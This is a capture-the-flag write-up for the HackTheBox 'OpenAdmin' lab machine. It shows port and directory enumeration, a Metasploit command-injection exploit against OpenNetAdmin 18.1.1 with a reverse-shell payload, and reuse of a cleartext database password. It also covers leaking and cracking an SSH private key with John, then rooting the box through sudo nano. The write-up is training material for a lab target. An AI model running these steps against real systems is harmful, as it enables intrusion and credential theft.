HackTheBox Openadmin Write Up2 May 2020
Let’s see what have we got here with nmap.
nmap -sC -sV -O -oA nmap/initial 10.10.10.171
-sC: run default script scan -sV: probe open ports to determine service/version info -O: OS detection -oA: output OS detection, version detection, script scanning, and traceroute
Nmap returns the results quick as it by default scans only for most popular 1000 ports, so lets scan all the ports while we investigate the initial nmap scan.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.171
-p-: scans from port 1 to 65535, same as -p1-65535
Let’s look at the http server.
The page has the default Apache 2 page, so let’s fire up gobuster.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.171 -x php,html -t 100
-w: use a wordlist -u: target url -x: search for extensions -t: number of threads to run
Gobuster found /music, if we take a look we can find a reference to 10.10.10.171/ona. This could also be achieved with dirbuster as it can parse html and search for other links. Gobuster doesn’t offer this functionality but it’s much faster. Let’s enum /ona.
Looks like some sort of a admin panel. Lets inspect further, we see it’s running OpenNetAdmin version 18.1.1, and we can see it’s not the latest version. We can run searchsploit for exploits for OpenNetAdmin.
Exploiting OpenNetAdmin with command injection exploit
So we have a exploit for the exact version which this server is running. We can copy
47772.rb into Metasploit. If you’re importing exploits into Metasploit you should run
reload_all in msfconsole after
cp the package.
searchsploit -m exploits/php/webapps/47772.rb
cp 47772.rb /usr/share/metasploit-framework/modules/exploits/linux/http/
After the modules have been reloaded we can use the exploit. Make sure to configure everything.
set lhost <your ip, run "ip addr" to find it> set rhost 10.10.10.171 set payload linux/x64/shell_reverse_tcp
After using this payload we get a shell as www-data. You can see who you are with
Privilege escalation with db password
Now we need to escalate privileges. Let’s see who is using this machine.
We have Jimmy and Joanna. Let’s enumerate the directory we are thrown in. You have to chech every folder from here. The key to escalating privileges is finding the
./local/config folder. We have a file with clear text password for the database.
Now we can assume one of the users was sloppy and used the same password for their account. Let’s to to ssh into one of them.
So we can ssh into Jimmy but it doesn’t contain the user.txt, so joanna is the user which we have to own. Now this is a bit tricky. We have to enumerate again. Directory
/var/www seems like a server of some sort.
Wierd server on localhost
So if we can access the server it will output us the ssh private key for joanna. Amazing, but how do we access that? Let’s run netstat
-l: listening connections -t: TCP connections
So we have an unusual port 52846 listening on localhost. We can curl from ssh as we can’t access this from the browser.
We’ve got a webpage, let’s access that main.php file from before.
Cracking the hash with John
Now we have the
id_rsa key for joanna we have to decrypt it, so we can get the password for the private key. Copy the key on your machine and save it as
id_rsa, and copy the
ssh2john script so we can use john on this key.
kali@kali:~/openadmin$ cp /usr/share/john/ssh2john.py .
Pipe the output to a file:
kali@kali:~/openadmin$ ./ssh2john.py id_rsa > hash.txt
We have the password.
bloodninjas, now let’s connect as Joanna.
from here we can cat
user.txt and we have got the user flag.
joanna@openadmin:~$ cat user.txt c9b2c...
Getting root is fairly easy. Each time you log into an user, try running
sudo -l so you can see if something can be ran as root, and exploited to gain a shell. Luckily we do have a command we can run as root.
If you encounter any command that can be ran as root you should check out GTFOBins. They can help you break out of an environment. Now run the above mentioned command as root, and get a shell as root. (note: you can also use the file read GTFOBin)
Privilege escalation with Nano
You might get confused as the first few commands will overwrite nano’s interface but just navigate to root.txt
$ whoami root $ cat /root/root.txt 2f907...
This is how I managed to gain root on this box. Hope you learned something through this write up.